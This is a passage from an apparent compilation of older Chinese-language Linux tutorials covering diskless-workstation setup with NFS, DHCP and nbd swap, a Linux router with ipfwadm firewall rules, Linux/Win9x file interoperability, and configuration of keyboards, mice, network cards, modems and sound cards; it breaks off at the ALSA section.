/usr (ro,no_root_squash)
/tftpboot/192.168.0.1 (rw,no_root_squash)
/tftpboot/192.168.0.2 (rw,no_root_squash)
/tftpboot/192.168.0.3 (rw,no_root_squash)
/tftpboot/192.168.0.4 (rw,no_root_squash)
2、动态主机配置协议服务器 dpchd
检查一下文件/etc/dhcpd.leases是否存在，若不存在就用命令touch /etc/dhcpd.leases
创建一个，然后编辑文件 /etc/dhcpd.conf ，加入以下内容
subnet 192.168.0.0 netmask 255.255.255.0 {
range 192.168.0.1 192.168.0.4;
}
3、NetWare 模拟器 marsw_nwe
编辑文件 /etc/nwserv.conf，找到下面的行
# 4 0x10 eth0 802.3 1
将该行开头的#去掉，再找到
4 0x0 * 802.3 1
在该行开头加上#
制作启动映象
进入Win95，将Win95(早期的版本，可以用服务器安装方式安装)安装光盘的
adminnettoolsnetsetuprplimage.exe 复制到硬盘，将启动软盘插入软驱，然后在
纯MSDOS方式下执行 rplimage a: 就会得到启动映象 net$dos.sys，再将启动映象
net$dos.sys 复制到启动盘上(如果启动盘空间不够，可以先删除启动盘上的一些文件以
留出空间)。
启动 Linux 服务器，以 root 用户登录，将启动软盘插入软驱，执行下面的命令
mount -t vfat /dev/fd0 /mnt/floppy
cp /mnt/floppy/net$dos.sys /var/mars_nwesyslogin
umount /dev/fd0
然后执行 setup ，移动光棒至 System services 选项回车，出现 Services 设置画面，
将dhcpd，nfs，mars-nwe 都设为有效，退出 setup 程序，执行以下的命令以启动上述服
务进程:
/etc/rc.d/rc3.d/*mars-nwe restart
/etc/rc.d/rc3.d/*dhcpd restart
/etc/rc.d/rc3.d/*nfs restart
下一次再启动服务器时，上述服务进程会自动执行。
至此，所有的设置工作全部完成了，联好网络随便打开一台无盘工作站，稍等一下，
出现远程引导的信息，接着会启动 Win95 ，接下来很快就会装载 Linux ，在一大堆
Linux 的启动信息之后如果看到 Linux 的登录提示，就说明远程启动成功了。
Linux 无盘工作站虽然运转起来了，但还有一个问题，就是交换的问题，因为Linux
是一个支持虚拟存储的操作系统，当机器内存不够时，Linux 就会把内存中暂时不用的数
据换出到交换设备上，等需要时再换回来，刚才我们没有设置交换区，在无盘工作站上用
free 命令就会发现交换区为零，如果无盘工作站内存较大，运行一些不大的程序，没有
交换区还是可以的，但若运行大型程序就会出问题，下面介绍在服务器上设置交换区即远
程交换的方法。
对于2.1.101版以前的内核，要实现远程交换可有点费事，得从网络上下载有关的补
丁来修改内核代码，然后再编译内核映象，从2.1.101版后内核支持网络块设备，实现远
程交换就容易了，首先编译内核时要使 Network block device support 选项有效(刚才
编译内核时就是这么作的)，再从http://atrey.karlin.mff.cuni.cz/~pavel/nbd/nbd.html
下载实用程序 nbd.14.tar.gz ，执行下面的命令
tar zxvf nbd.14.tar.gz
cd nbd
./configure
make
编译完后会得到文件 nbd-server 和 nbd-client，将它们复制到 /usr/sbin 下面:
cp nbd-server nbd-client /usr/sbin
然后编辑文件 /etc/rc.d/rc.sysinit，在文件最后加上一行
/usr/sbin/nbd-server 7999 /tftpboot/%s/swap > /dev/null &
执行刚才的命令激活nbd服务:
/usr/sbin/nbd-server 7999 /tftpboot/%s/swap > /dev/null &
下一次服务器启动时，上述命令会自动执行。
再在服务器上每个工作站目录(/tftpboot/192.168.0.1，/tftpboot/192.168.0.2等等)下
为各个无盘工作站建立交换文件，命令如下(本例中交换区大小为32M):
dd if=/dev/zero of=swap count=32768 bs=1024
mkswap swap
在每个工作站目录下文件 /etc/rc.d/rc.sysinit 的最后加上两行
/usr/sbin/nbd-client server 7999 /dev/nd0
swapon /dev/nd0
就这么简单，再打开无盘工作站试一试启动成功后登录系统，执行命令 free 就会看到在
显示信息的最后有这样一行:
Swap: 32764 XX XXXX
说明交换区设置成功了。
这样，一个完整的 Linux 无盘工作站网络就作好了，Linux 无盘工作站的用法很灵活，既可以象使用普通有盘工作站一样使用，还可以把无盘工作站当成别的 Unix 主机的终端，特别是可以作为 X 终端，运行远程 Unix 主机上的 X 应用。
最后告诉大家，如果你想采用BOOTP方式作 Linux 远程引导，我可以提供 EPROM 刻录服务，当然要收取少量的刻录费用．

返回


基于Linux的路由器和防火墙配置

《一键清理系统垃圾》

基于Linux的路由器和防火墙配置

    随着Internet应用的日益普及,免费网络操作系统Linux受到越来越多的网络爱好者 的关注。通过简单的安装,人们就可以获得Linux提供的多项网络服务,诸如域名服务、电 子邮件、匿名FTP服务等。同时,它还提供了图形工作站所具有的Xwindows系统。可以说 ,Linux已经具备了网络服务器的所有功能。在此,笔者想结合自己的工作经验,谈谈Linu x在另一方面的用途,即将Linux作为路由器连接两个不同的网段,并在其上配置防火墙,以 实现网络的存取访问控制和流量统计的功能。

    要想使一台装有Linux的PC具有路由器的功能,首先要进行硬件配置。名为Router的PC上装有Linux系统,并配有两块网卡,每块网卡连接一个不同的网段,该机作 为路由器在两个网段间转发IP数据包。为了防止两块网卡的中断发生冲突,需要网卡驱动程序将中断分别设为不同值。笔者在实践时将其中断号和I/O地址分别设置为:3,0x300H 和4,0x320H。

    硬件配置完毕,还需要在软件上做相应的配置。在通常的安装模式下,Linux系统不具 备路由器的功能,因此,必须重新安装Linux内核。以Slackware版的Linux为例,其重新配 置内核的过程为:

    1. #cd/usr/src/linux
    /*进入Linux的源代码目标*/

    2. #make config
    /*进行编译选项的配置*/

    在该步中,系统会提供编译过程中的一些选项,供用户根据自己的实际情况进行选择 。对于无法确定的选项,用户可选择系统缺省值。在网络部分编译的询问中,会出现如下 的提示:

    network firewall[y/n/N]?
    /*内核是否支持防火墙*/
    ……
    TCP/IP networking[n/y/Y]?
    /*主机是否连接TCP/IP网络*/
    IP: forwarding/gatewaying [n/y/Y]?
    /*主机是否转发数据库或作为网关*/
    ……
    IP:firewalling[y/n/N]?
    /*是否在TCP/IP网络内设置防火墙*/
    IP:firewall packet logging[y/n/N]?
    /*是否在防火墙上登记数据包*/
    ……
    IP:accounting[y/n/N]?
    /*是否对数据包计帐*/
    IP:optimize as router not host[y/n/N]?
    /*是否将主机设置为路由器*/
    ……
    IP:multicats routig [y/n/N]?
    /*路由器是否向外广播路由信息*/

    因为我们要将此主机配置为路由器,并在其上设置防火墙,故对这些选项统一选"y"。

    3.#make dep
    /*根据编译选项做编译前的准备工作*/

    4.#make zlmage
    /*开始编译内核并命名编译后的内核文件名为zlmage*/

    编译后的内核存于"/usr/src/linux/arch/i386/boot"目录。在系统原内核备份后, 用户可将该文件拷贝到根目录下,并改名为"vmlinuz",运行"lilo",使其在下次启动时生 效。

    重构内核后,需对两块网卡的TCP/IP部分进行设置,使其能有效地连接两个不同的网 段,并能在两个网段进行IP数据包的转发。设置步骤为:

    1.对于NE2000兼容的网卡,修改"/etc/rc.d/rc.modules"文件;

    /sbin/modprobe ne io=0x300,0x320
    /*识别两块网卡*/

    2.修改"/etc/rc.d/rc.inetl"文件,设置两网卡的IP地址、掩码及到两网卡的路由

    信息;

    IPADDR="202.207.0.27"

    NETWORK="202.207.0.0"

    BROADCAST="202.207.0.255"

    IPADDR1="202.207.7.2"

    NETWORK1="202.207.7.0"

    BROADCAST1="202.207.7.255"

    NETMASK="255.255.255.0"

    /sbin/ifconfig eth0 ${IPADDR} broadcast${BROADCAST} netmask${NETMASK}

    /sbin/ifconfig eth1 ${IPADDR1} broadcast${BROADCAST1} netmask${NETMASK}

    /sbin/route add-net ${NETWORK} netmask${NETMASK} eth0

    /sbin/route add-net ${NETWORK1} netmask ${NETMASK} eth1

    3.修改"/etc/rc.d/rc.inet2"文件,打开关于"Routed Server"的注释,使其可以与其它路由器交换路由信息,并转发IP数据包。

    ## Start the Routed server

    if[-f ${NET}/routed];then

    echo -n"routed"

    ${NET}/routed -g -s

    /*启动程序*/

    fi

    4.在"/etc/lilo.conf"文件中增加一行,使其在启动时识别第二块网卡。

    append="ether=0,0x320,ethl"

    完成上面的设置后,应重新启动计算机,系统会识别到两块网卡,并按照"/etc/rc.d/ rc.intel"文件中的说明对网卡的IP地址、掩码进行设置。启动完成后,以超级用户root 的身份进入系统,键入下面的命令即可看到关于网卡和路由的信息。

    #ifconfig /*显示网卡的详细信息*/

    #route

    /*显示系统的路由表*/

    笔者曾将学生机房局域网内的PC通过Linux路由器与校园网相接,并进一步通过校园 网进入Internet。此外,笔者又在Linux路由器上配置了防火墙。实践证明,防火墙有效地 控制住了学生对非法IP地址的访问,并成功地记录下每个IP地址的网络流量,为计费和网 管提供了依据。Linux的防火墙配置可以通过简单的命令逐条进行,也可编写shell程序放 到系统的启动目录下自动执行。其命令格式非常简单,现举例如下:

    #ipfwadm -A

    /*对通过路由器的所有数据包进行计帐*/

    #ipfwadm -I -a accept -S 162.105.0.0/16

    /*接受来自162.105.0.0网络的所有数据包*/

    #ipfwadm -I -a deny -S 159.226.0.0/16

    /*丢掉来自159.226.0.0网络的所有数据包/

    #ipfwadm -O -a reject -S 210.32.0.0/12

    /*丢掉发往210.32.0.0网络的所有数据包,并发送拒绝信息包给请求者*/

    读者可根据实际需要进行防火墙的配置,以达到期望的效果。

返回


如何实现Linux与Win 9x互操作

《一键清理系统垃圾》

如何实现Linux与Win 9x互操作

----很多计算机爱好者都是在一台机器上同时安装Win 9x和Linux，Win 9x在第1个分区(/dev/hda1)，Linux在第2个分区(/dev/hda2)，然后通过LILO开机引导选择其中一种OS进行单一操作。能不能在Linux下访问Win 9x的文件，在Win 9x下访问Linux的文件，实现两者相互交叉访问，进行互操作呢？
----答案是肯定的。两个OS共处同一硬盘，有了良好的物质基础，现在要做的就是软件上的“搭桥”。

在Linux下访问Win 9x

----Linux对Win 9x支持比较多，因此，在Linux下访问Win 9x还是容易实现的，常用的方法有下面几种：

----1.利用mount挂装文件系统访问Win 9x

----这种方法是把Win 9x分区作为Linux的一个“文件系统”挂装到Linux的某个空文件夹下（通常为/mnt文件夹），将Win 9x分区与mnt文件夹联系起来，访问/mnt文件夹实际上就是访问Win 9x。

----举例如下:

mount /dev/hda1 /mnt 将Win 9x分区挂到Linux下的/mnt文件夹

more /mnt/autoexec.bat 在Linux下查看Win 9x文件autoexec.bat的内容

cp /mnt/windows/win.com /tmp 在Linux下将Win 9x的\windows\win.com拷贝到Linux的/tmp文件夹，文件名仍为win.com

rm /mnt/windows/temp/.tmp 在Linux下将Win 9x的\windows\temp文件夹中的临时文件都删除

----2.利用wine运行Win 9x程序

----wine是Linux提供的Win 9x仿真器，它模拟出一个Win 9x环境，可以使一些常用的Win 9x程序直接在Linux下运行。

----wine的命令格式为： wine “Win 9x程序名 Win 9x程序参数”

----wine默认的Win 9x程序查找路径为c:\windows和c:\windows\command，如果想调用的Win 9x程序不在这些标准路径时，应指明绝对路径。

----下面是例子：

wine "winver" 在Linux下调用Win 9x的winver程序，该程序将显示Win 9x的版本情况(参见图1)。

图1

wine "notepad C:\test.txt" 在Linux下调用Win 9x的notepad记事本程序，编辑Win 9x C盘上的文件test.txt。

----需要注意的是：wine还不能支持非标准的Win 9x程序。如果使用英文Linux和wine去调用中文Win 9x程序，则可能出现乱码。

----3.利用mtools软件包访问Win 9x

----mtools是一组命令的总称，被Linux用来访问Win 9x(包括DOS)磁盘文件，常用的有mdir、mtype、mcopy、mdel、mdeltree、mformat、mcd等，去掉每个命令前的m ，不就是那些最常用的Win 9x(DOS)命令吗？从字面上您就可以猜出它们各自的用途了。下面是几个例子：

mdir c:/.bat 在Linux下列出Win 9x下C盘根文件夹下所有的批处理文件。

mcopy c:/windows/temp/test.tmp ./Win9x.tmp 将Win 9x下C盘\windows\temp文件夹中的test.tmp拷贝到Linux当前文件夹下，改名为Win 9x.tmp。

----在Win 9x下访问Linux

----Win 9x本身没有提供直接操作Linux的软件,若要实现在Win 9x下访问Linux,需安装第3方支持软件。目前，在Internet上此类软件很多，这里仅以自由软件explore2fs为例，该软件很小，只有700多kB。

----从explore2fs的字面来看，前半截explore是“资源管理器”，后半截2fs是指Linux的ext2型文件系统，可想而知，这是一个用Win 9x资源管理器界面来操作Linux分区的软件。

----安装与调用

----在Win 9x下任选一文件夹，将软件解包、安装，重新启动Win 9x，双击explore2fs图标即可打开操作窗口(参见图2)。

图2

操作

----在explore2fs左窗格里以树型结构显示出整个Linux分区情况，可单击“＋”、“－”来展开、折叠子文件夹。在右窗格里显示当前Linux文件夹中的文件，以小企鹅图标显示，您可以用File、Edit、View选单对选中的文件进行操作；当然，您也可单击鼠标右键，用快捷选单来操作。需要指出的是，Linux有文件保护机制，如果您权限不够则系统拒绝对文件进行读写。

返回


如何在Linux下实现设备的配置（上）

《一键清理系统垃圾》

如何在Linux下实现设备的配置（上）

    本文是《如何在Linux下实现硬件的自动检测》的姊妹篇。将为您介绍在进行了设备检测，通过设备信息文件获得了设备对应的驱动程序，工作参数等信息后，如何对于几种最常见的设备进行配置、生成正确的配置脚本，以使设备正常工作。
Linux下设备的配置过程是指在检测到设备类型、设备当前工作参数等信息之后，使用这些信息来配置设备的驱动程序，工作方式等，（设备的检测过程参见《如何在Linux下实现硬件的自动检测》）。要完成这样的任务，需要做两方面的工作：

其一是需要一个详尽的设备信息文件，这个文件描述了设备标识、与设备标识对应的设备驱动程序、设备配置参数（设备选项）、设备设置的详细描述、设备配置方法描述、设备对应的别名、设备的主设备号等信息。

现在的Linux内核中使用kmod来完成设备模块的自动加载，它的一般工作机制是：在第一次引用设备模块时，内核使用系统命令/sbin/modprobe加载这个设备模块。为了使这种机制正常工作，您首先需要使用depmod -a建立表述模块之间依赖关系的文件modules.dep，然后在/etc/modules.conf中设置正确的设备别名，如果还需要设置设备对应的参数。举例来说，在设置网卡时网卡的驱动程序是ne2k-pci，网卡的设备别名是eth0，则在文件/etc/modules.conf中加入别名alias eth0 ne2k-pci，就设置了ne2000兼容的PCI网卡，这样当有程序要尝试访问网络时，内核会自动加载网卡驱动程序ne2k-pci。

其二是需要根据设备的类型，以及安装的Linux系统版本（不同的Linux发行版对于同一设备的配置脚本文件存在差异），设置设备对应的配置脚本文件。

1 配置键盘
1.1 配置键盘的设备模块
对于我们常见的键盘一般有三种类型，其一为老式的五针键盘，其二为ps/2键盘，其三是usb鼠标。对于前两种键盘，一般现在的Linux发行版都把它们需要的设备模块打包入内核，所以无需进行附加的模块插入操作，键盘就能够正常工作。而对于usb类型的键盘，一般而言，要使它正常工作必须先插入对应的设备模块。

对于usb类型的键盘，您若是要通过手动加载模块的方式使其工作，必须首先插入usb桥接器模块，然后您还必须插入键盘模块usbkbd.o，以及keybdev.o，这样usb键盘才能够正常工作。此时，运行的系统命令：
/sbin/modprobe usbkbd
/sbin/modprobe keybdev

对于2.2.x系列的内核若要内核的kmod在需要时自动加载则必须在/etc/modules.conf文件中设置别名usb-interface，它对应您所使用的桥接器模块。例如，当桥接器的类型为UHCI时，在/etc/modules.conf中加入设备别名：
alias usb-interface usb-uhci

对于2.4.x系列的内核，此设备别名则变为：
alias usb-controller usb-uhci
在设置了此别名之后，系统启动时会自动进行usb设备检测。当检测过程发现连结的设备是系统支持的，那么系统会自动插入所需的模块。

1.2 键盘配置文件
键盘的配置文件/etc/sysconfig/keyboard，它的内容很简单，可选配置项为KEYTABLE（随着发行版本的不同这个文件的内容会有所差异，但是这个字段是最重要的）。例如，当设置KEYTABLE = "us"时，表示系统使用美式键盘。

然后，为了正确的使用键盘上的功能键，您还需要调用命令dumpkeys生成文件/etc/sysconfig/console/default.kmap。
/usr/bin/dumpkeys > /etc/sysconfig/console/default.kmap
这个文件描述了键盘的键盘扫描码和加入键盘修饰之后的键盘的相应的键盘扫描码。

同样，为了键盘能在X系统环境下正常工作，您可能也需要在X系统下对键盘进行设置，这时您就必须使用xmodmap来设置正确的键盘映射。例如，
/usr/X11R6/bin/xmodmap /usr/share/xmodmap/xmodmap.fr
设置您的X系统下的键盘为法语键盘。

在正确的配置了/etc/sysconfig/keyboard文件之后，X系统的配置程序会根据此文件的信息配置X中关于键盘配置的小节。当此文件内容不正确或者是此文件不存在时，X系统是无法启动和配置的。

2 配置鼠标
2.1 鼠标的基本信息
Linux支持四种不同的总线鼠标硬件接口：Inport（Microsoft），Logitech，PS/2和ATI-XL。2.4内核也支持IBM PC110数字化板和Apple Desktop鼠标。

Inport mice
Inport mice包含大多数旧类型的微软鼠标。Inport mice通常连接到主板的接口卡上。假如鼠标线连接头是圆的，有9针，则可能是Inport mice。
Logitech mice
PS/2 mice
ATI combo video/mice
IBM PC110 palmtop digitizer
Apple Desktop Mouse
Hybrid Mice
对于鼠标协议，大多数总线鼠标使用BusMouse协议，一些古老的Logitech鼠标使用MouseSystems协议，而一些更老的微软鼠标使用Logitech协议。PS/2鼠标总是使用PS/2协议。

不同类型的鼠标对应的设备文件：

接口类型 设备 主设备号 次设备号
Logitech /dev/logibm 10 0
PS/2 /dev/psaux 10 1
Inport /dev/inportbm 10 2
ATI-XL /dev/atibm 10 3
USB mouse /dev/input/mice 13 63
表2-1

创建对应设备的命令：
mknod /dev/logimm c 10 0
mknod /dev/psaux c 10 1
mknod /dev/inportbm c 10 2
mknod /dev/atibm c 10 3
mknod /dev/input/mice c 13 63

在创建了鼠标对应的设备文件之后，因为现在很多程序都使用/dev/mouse作为缺省的鼠标设备文件，所以为了使鼠标正常工作你还要创建一个符号连接/dev/mouse指向真实的鼠标设备文件。例如，对于ps/2鼠标，/dev/mouse指向/dev/psaux，对于usb鼠标，/dev/mouse/指向/dev/input/mice，对于串口鼠标/dev/mouse指向/dev/ttyS0。对于不同的linux发行版本，这些文件可能有所不同，上述介绍主要是基于Redhat发布的配置。

对于现在最常见的三种鼠标：串口鼠标、PS/2鼠标和USB鼠标而言，由于对PS/2鼠标支持一般都打在内核中，所以您也不需要在鼠标工作之前插入设备模块。但对于其他的两种鼠标，插入模块的操作一般是必须的。对于串口鼠标而言，您必须先插入模块serial.o，
/sbin/modprobe serial

成功的插入模块之后，如果串口鼠标支持即插即用的串口协议，您可以从串口（/dev/ttyS*）读到鼠标的类型信息，然后由此信息，完成鼠标的配置文件。对于USB鼠标，为了使其正常工作，您必须先插入模块usbmouse.o和mousedev.o
/sbin/modprobe usbmouse
/sbin/modprobe mousedev
同样，为了使鼠标驱动程序能够自动加载，您也需要在/etc/modules.conf文件中创建usb-interface（usb-controller）别名。

2.2 鼠标配置文件
正确配置鼠标必须生成配置文件/etc/sysconfig/mouse，它包括下列选项：MOUSETYPE、XMOUSETYPE、FULLNAME、XEMU3、DEVICE。该鼠标配置文件也是X配置文件中鼠标配置节的基础。如果没有这个文件，很多X配置程序将无法工作。

MOUSETYPE=
配置鼠标的类型，包括ps/2、Busmouse、imps2、netmouse、Microsoft、Logitech、MouseMan、MMHitTab、MouseSystems、pnp、logim、ms3、MMSeries等。

XMOUSETYPE=
X系统下配置的鼠标的类型，包括MouseMan、IntelliMouse、MMSeries、MMHittab、Logitech、MouseMan、Microsoft、MouseSystems、PS/2、BusMouse等。

FULLNAME=
描述鼠标设备的全名。例如，对于普通PS/2鼠标，其全名为PS/2|Standard。

XEMU3=
是否仿真三键鼠标，可选参数为yes或no。

DEVICE=
描述鼠标对应的设备文件。例如。对于普通PS/2鼠标，设备文件为psaux。

2.3 鼠标的配置技巧
通过gpm能在命令行方式下使用鼠标。这样在控制台方式下，就可以使用鼠标进行剪贴等操作了。例如，对于ps/2鼠标，它的配置方式是：
gpm -t ps/2 -m /dev/psaux
如果不指定-m选项，那么系统会去查找文件/dev/mouse。

鼠标移动不规则可能是因为对鼠标设置了错误的协议。如新的Logitech鼠标不使用Logitech协议，而用微软协议（MouseMan）。如果您的鼠标移动不规则，那您可能首先需要尝试更换一下MouseType（XMouseType）指定的值。
在X系统下，您如果需要更换鼠标的左、右键，那么可以执行xmodmap -e "pointer = 3 2 1"。

3 网卡配置过程
3.1 配置网卡的设备模块
按照总线类型来分，现在的以太网卡主要有PCI网卡、ISA网卡和PCMCIA网卡。为使这些网卡正常工作，要在/etc/modules.conf中设置设备别名eth0，以及要传递给驱动程序的设备参数。这样内核在需要使用驱动程序时，会由内核服务kmod使用系统命令modprobe（insmod）自动装载需要的设备模块。

在配置网卡时，如果此网卡能够自动检测，那么您只需要通过设备标识，在设备描述信息文件中查得它对应的设备驱动程序，然后再由此信息配置网卡。但是这种方法对于普通isa总线的ne2000兼容网卡就不适合了，因为它们在设计时一般不满足isapnp规范，因此无法读出它们的设备信息。但是这种类型的网卡一般使用ne作为设备驱动程序，但是为使其正常工作还须指定io地址和占用的irq。

例如，对于ne2000兼容的isa网卡，比如DE220X，它们的驱动程序为ne。此时要使这种网卡正常工作，需要在/etc/modules.conf文件中加入：
alias eth0 ne
options ne io=0x300 irq=5

一般而言，对于这种网卡，只有指定了正确的I/O地址空间，网卡才能正常工作。这个地址是和此网卡在DOS下使用的端口地址完全相同的。如果端口地址0x300上不能找到网卡，那么您可以试试0x240等其他地址。

3.2 网卡配置文件
要正确的配置网卡必须生成如下脚本文件，/etc/sysconfig/network，/etc/sysconfig/network-scripts/ifcfg-eth0（对于只有一个网卡时，多个网卡为ifcfg-eth1、ifcfg-eth2以此类推）和/etc/hosts。若您还需要配置域名解析服务，那么还要生成文件/etc/resolv.conf。

对于/etc/sysconfig/network脚本文件，最常用的可设置项包括NETWORKING，FORWARD_IPV4，HOSTNAME，DOMAINNAME，GATEWAY，GATEWAYDEV。注意：在没有配置网卡时，也要设置此文件，以使得本机的回环设备(lo)能够正常工作，此设备是很多linux内部通讯的基础。

NETWORKING=
表示系统是否使用网络，一般设置为yes。如果设为no，则不能使用网络，而且很多系统服务程序将无法启动。

FORWARD_IPV4=
表示是否支持ipv4的自动转发。一般在只有一块网卡时，设置此项为false。

HOSTNAME=
设置本机的主机名，这里设置的主机名要和/etc/hosts中设置的主机名对应。

DOMAINNAME=
设置本机的域名。

GATEWAY=
设置本机连接的网关的IP地址。例如，网关为10.0.0.2

GATEWAYDEV=
与此网关进行通讯时，所使用的网卡设备别名。例如，当使用了一块网卡，并连接了网关时，此时的值为eth0。

缺省没有网卡时的设置为：
NETWORKING="yes"
FORWARD_IPV4="false"
HOSTNAME="localhost.localdomain"
DOMAINNAME="localdomain"

/etc/sysconfig/network-scripts/ifcfg-*，描述网络接口的信息。每个不同的网络接口对应不同的文件。例如，ifcfg-eth0对应第一块网卡eth0可能出现的配置信息。常见的配置选项包括DEVICE、BOOTPROTO、IPADDR、NETMASK、NETWORK、BROADCAST、ONBOOT。

DEVICE=
描述网卡对应的设备别名，例如ifcfg-eth0的文件中它为eth0。

BOOTPROTO=
设置网卡获得ip地址的方式，可能的选项为static，dhcp或bootp，分别对应静态指定的ip地址，通过dhcp协议获得的ip地址，通过bootp协议获得的ip地址。

IPADDR=
如果设置网卡获得ip地址的方式为静态指定，此字段就指定了网卡对应的ip地址。

NETMASK=
网卡对应的网络掩码。

NETWORK=
网卡对应的网络地址。

BROADCAST=
对应的子网广播地址。

ONBOOT=
系统启动时是否设置此网络接口，设置为yes时，系统启动时激活此设备。

/etc/resolv.conf，系统生成这个文件进行域名解析。否则，安装过程的反向名查询无法工作。可能出现的选项：
search domainName指定的域名
nameserver dnsServer 域名服务器，可以指定多个。
/etc/hosts，将主机名列表加入此文件。

4 Modem配置过程
对于Modem的配置过程而言，我们现在一般使用kppp进行拨号，使用这个程序整个拨号过程将变得非常简单。因此本文就不再介绍使用pppd和chat进行的手工拨号过程了。本文仅介绍一下如何设置基本的设备驱动模块和底层设备文件的配置。在配置这些文件之后，您就可以使用kppp拨号了。

4.1 外置Modem
在配置外置Modem时，因为大部分的Modem都是通过串口连接到计算机上的，所以在配置Modem之前，您必须插入串口驱动模块serial.o。在成功插入串口通讯模块之后，这时只要将设备/dev/modem连接到相应的串口设备上就可以了。例如，在/dev/ttyS0（对应Windows下的COM1）上连接了Modem，则建立连接：
ln -sf /dev/ttyS0 /dev/modem

在这之后，外置的串口modem就可以正常工作了。您可以通过使用minicom向串口发送AT命令，来检测和配置modem的工作方式。经常使用的命令： AT命令 命令描述
ATDT（ATDP） 使用语音（脉冲）进行拨号
ATZ 复位调制解调器
ATH 挂起电话
ATI0 返回调制解调器的状态
ATI1 执行ROM校验和检查并返回值
ATI2 验证ROM校验，返回OK或ERROR
ATI3 返回ROM部件的软件版本号。
ATI4 查询调制解调器的状态信息，包括波特率、奇偶校验位长度，字长度、拨号方式、寄存器状态等信息。
ATI5 查询调制解调器的ram中的状态信息。
ATI6 查询调制解调器的链路状态信息，包括已传送（接收、丢失）的字符数、传送的数据块数目、链路连接状态、最后一次拨号时间等。
ATI7 获得配置的序言文件，此文件描述的信息包括：modem支持的通讯协议，Fax版本号，EPROM的版本号。
ATI8 获得连接时间
ATI9 获得调制解调器的描述名称
表 4-1

例如，对于一款联想射雕外置式Modem，在启动minicom之后，输入ATI9的返回值为：
(1.0AKY1010\ModemAKY101056K DATA FAX VOICE MODEM)FF

4.2 内置的Linmodem
Linmodem是winmodem的Linux实现。关于Linmodem的进一步信息您可以访问www.linmodems.org。现在的Linmodem一般都是PCI类型的，您也可以通过PCI检测过程，获得设备设备描述信息。在获得描述信息之后，您可以比较一下您的Modem是否属于下面列出的Modem类型。现在支持的Linmodem包括：

Conexant/Rockwell HSF
它的驱动程序在http://www.olitec.com/pci56kv2.html或http://linmodems.org。
Ambient Technology (formerly Cirrus Logic)
驱动程序在http://linmodems.org/CLModem-0.3.0.tar.gz。
Lucent LT
http://linmodems.org/linux568.zip
PCTel
PCI、AMR和Zoltrix Phantom类型的二进制驱动程序：http://www.kcdata.com/~gromitkc/winmodem.html#drivers。
ESS
ES56T-PI (PCI) and ES56V-I (ISA)的二进制驱动程序：
ISA: ftp://ftp.esstech.com/pub/modem/isa/unsupported/56v-i/linux/kernel61/linux111.zip。
PCI: ftp://ftp.esstech.com/pub/modem/pci/unsupported/56t-pi/linux/Kernel61/111.zip。
3Com Mini-PCI
无可用驱动程序。

Linmodem为了在某种程度上和外置调制解调器的编程接口一致，所以一般都要生成一个仿真的串口设备。为了生成这些设备文件，一般可以使用命令mknod。

Lucent LT:
mknod /dev/ttyS14 c 62 78
PCTel:
mknod /dev/ttyS15 c 62 79
Esscom:
mknod /dev/esscom c 127 1。esscom用户希望连接/dev/ttyS14到/dev/esscom，以使得仅识别ttyS*的ppp拨号程序能正常使用。
chgrp uucp /dev/ttyS14
chmod 666 /dev/ttyS14
可允许非根用户使用此服务拨号。
ln -s /dev/devicefile /dev/modem

您也可以使用setserial，修改串口配置，比如设置串口的波特率，同样也可以设置/etc/serial.conf设置串口的工作参数。
setserial -agv /dev/ttyS*

5 声卡配置过程
5.1 内核声卡驱动程序的配置
现在正在使用的声卡主要有PCI和ISA两种。在Linux系统下，对这两种类型声卡的配置过程实际上是生成配置文件/etc/modules.conf，建立正确的设备别名和声卡设备驱动程序的对应关系。在正确的设置驱动模块之后，使用混音器程序设置声卡的输出音量。

若您的声卡是ISA PnP类型的，那么如果这块声卡在dos（windows）系统下也工作良好，那么您可以先记住声卡的工作参数，包括IRQ、DMA和I/O。一般而言，在Linux系统下应该使用和DOS下一样的参数。

如果您不知道它的工作参数，您可以通过/proc/isapnp获得声卡的配置空间，它包括dma、ioport和irq等信息。然后您可以通过检查/proc/interrupts，/proc/ioports和/proc/dma文件获知系统中空闲的irq、ioports和dma等信息，由此您可以选择合适的声卡配置参数。

在2.4.x内核中，实现了ISA PnP支持，同时一部分声卡驱动程序现在也支持无需使用isapnp工具完成自动检测和配置了。关于声卡设备的详细信息您也可以查看内核文档/usr/src/linux/Documentation/sound/中的文件。

对于PCI声卡而言，它们的驱动程序包含了自动检测过程，所以您只需要插入正确的驱动模块，声卡一般就能正常工作了。

在声卡模块被第一次引用时，内核会要求加载相应的驱动模块。与声卡模块对应的设备别名是sound-slot-0（0表示系统中的一个声卡，以此类推）。例如，在/etc/modules.conf中加入：
alias sound-slot-0 esssolo1
就配置了ESS Solo-1声卡。这条语句表示在需要声卡时，自动加载模块esssolo1。

有时加载了sound-slot-0对应的设备模块之后，并不能使声卡的所有功能生效。这时设备就会请求访问sound-service-0-n别名。n代表了不同的设备： 编号 对应的设备
0 混音器（Mixer）
2 MIDI
3，4 DSP
表 5-1

这时就要求您设置正确的声卡服务模块别名，这样声卡才能够正常工作。声卡对应的设备文件： 设备文件名 设备描述
/dev/audio 正常连接到/dev/audio0
/dev/audio0 sun工作站兼容的声音设备（仅部分实现，不支持sun ioctl接口，仅支持u-law编码）
/dev/audio1 第二个声音设备（安装多个声卡时使用）
/dev/dsp 正常连接到/dev/dsp0
/dev/dsp0 第一个数字采样设备
/dev/dsp1 第二个数字采样设备
/dev/mixer 正常连接到/dev/mixer0
/dev/mixer0 第一个声音混音器
/dev/mixer1 第二个声音混音器
/dev/music 高级序列化接口
/dev/sequencer 底层MIDI，FM和GUS存取
/dev/sequencer2 正常连接到/dev/music
/dev/midi00 第一个原MIDI端口
/dev/midi01 第二个原MIDI端口
/dev/midi02 第三个原MIDI端口
/dev/midi03 第四个原MIDI端口
/dev/sndstat 显示声音驱动程序的状态
表 5-2

pc扬声器提供下列设备：
/dev/pcaudio 等价于/dev/audio
/dev/pcsp 等价于/dev/dsp
/dev/pcmixer 等价于/dev/mixer

您可以直接将声音文件送入对应的设备，比如，将.au声音文件通过将其送入/dev/audio中播放，原始采样也可被送入/dev/dsp。
cat sample.su > /dev/audio

但是这样做一般效果较差，播放时应采用play命令。对于wavplay和vplay（snd-util包）会以最好的效果播放wav文件，但是它们不能识别微软adpcm压缩的wav文件。若手动设置争取正确的参数之后，splay用于播放大多数声音文件。

读/dev/audio和/dev/dsp返回的采样数据可以重定向到一个文件。vrec可以使这个过程更容易。可能需要一个混音器程序选择适当的输入设备。

5.2 ALSA声卡驱动程序的配置
